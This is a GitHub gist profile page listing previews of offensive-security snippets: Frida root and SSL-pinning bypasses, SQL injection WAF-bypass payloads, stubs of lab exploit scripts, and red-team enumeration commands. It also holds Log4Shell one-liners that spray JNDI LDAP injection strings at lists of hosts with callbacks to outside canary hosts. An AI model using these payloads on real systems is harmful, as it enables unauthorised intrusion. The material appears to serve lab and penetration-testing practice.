Skip to content

Instantly share code, notes, and snippets.

View cyberheartmi9's full-sized avatar
:octocat:
Breaking stuff

PikaChu cyberheartmi9

:octocat:
Breaking stuff
375 followers · 27 following
View GitHub Profile
@cyberheartmi9
cyberheartmi9 / kony.js
Created September 4, 2024 10:50
Java.perform(() => {
var inc = 0;
function waitForLibrary(name, callback) {
var lib = null;
var interval = setInterval(() => {
try {
lib = Module.ensureInitialized(name);
console.log(`[+] ${name} is loaded`);
clearInterval(interval);
@cyberheartmi9
cyberheartmi9 / tmux.conf
Created February 22, 2024 23:01
unbind C-b
set-option -g prefix C-a
bind-key C-a send-prefix
bind | split-window -h
bind - split-window -v
unbind '"'
unbind %
bind r source-file ~/.tmux.conf
@cyberheartmi9
cyberheartmi9 / gist:c296202c4428b65173b870da8b53a386
Created January 7, 2024 18:51 — forked from tehseensagar/gist:d82931fa8427b3b8a8825714b5b113c4
SQLi WAF Bypass All Method
`-=[SQL injection Queries]=-
HOW TO SUCCESSFULLY INJECTING SQL INJECTION
[~] after id no. like id=1 +/*!and*/+1=0 [~]
EX: site.com?index.php?pageid=3 div+0 Union select 1,version(),3,4,5
+div+0
+div false
+Having+1=0+
@cyberheartmi9
cyberheartmi9 / XSS-To-RCE.py
Created September 3, 2023 20:47
OSWE Like Machine: https://pentesterlab.com/exercises/xss_and_mysql_file/course
import requests
import socket
import sys
import random
import string
banner="""
@cyberheartmi9
cyberheartmi9 / Tudo-exploit.py
Last active September 1, 2023 12:59
Tudo Exploit OSWE Like Machine : https://github.com/bmdyy/tudo/tree/main
import requests
import sys
import re
import random
import string
import socket
import time
proxies={"http":"127.0.0.1:8080"}
@cyberheartmi9
cyberheartmi9 / SecureCode-1.py
Last active July 9, 2023 20:40
SecureCode-1: https://www.vulnhub.com/entry/securecode-1,651/
import requests
import sys
import re
import random
import string
banner="""
@cyberheartmi9
cyberheartmi9 / ssl-pinning-root-bypass.js
Created June 5, 2023 05:07
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto ([email protected]):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
@cyberheartmi9
cyberheartmi9 / middleware Missconfig
Created April 16, 2023 06:47
# PT Reverse Proxy
## Exploiting HTTP Splitting with cloud storage
location ~ /docs/([^/]*/[^/]*)? {
proxy_pass https://bucket.s3.amazonaws.com/docs-website/$1.html;
}
@cyberheartmi9
cyberheartmi9 / Log4Shell
Created December 9, 2022 13:49
# Log4Shell Some Proved Testing Methods
# Oneliner 1:
$ cat vulnerable-hosts.txt | sed 's/https\?:\/\///' | xargs -I {} echo '{}/${jndi:ldap://{}.L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}' >> L4SFuzzList
$ httpx -l L4SFuzzList
#Oneliner 2:
$ cat 1.txt | while read host do; do curl -sk --insecure --path-as-is "$host/?test=${jndi:ldap://L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}" -H "X-Api-Version: ${jndi:ldap://log4j.requestcatcher.com/a}" -H "User-Agent: ${jndi:ldap://L4J.quua8mp7vfexh3a3qkf1sggj9.canarytokens.com/a}";done (Credit:https://twitter.com/HackerGautam/status/1469751218926882816)
# The Great resource to learn and earn:
https://github.com/pentesterland/Log4Shell
@cyberheartmi9
cyberheartmi9 / Red-Team-notes
Last active January 6, 2024 03:43
# Enumeration
# Credential Injection
runas.exe /netonly /user:<domain>\<username> cmd.exe
# enumeration users
users
net user /domain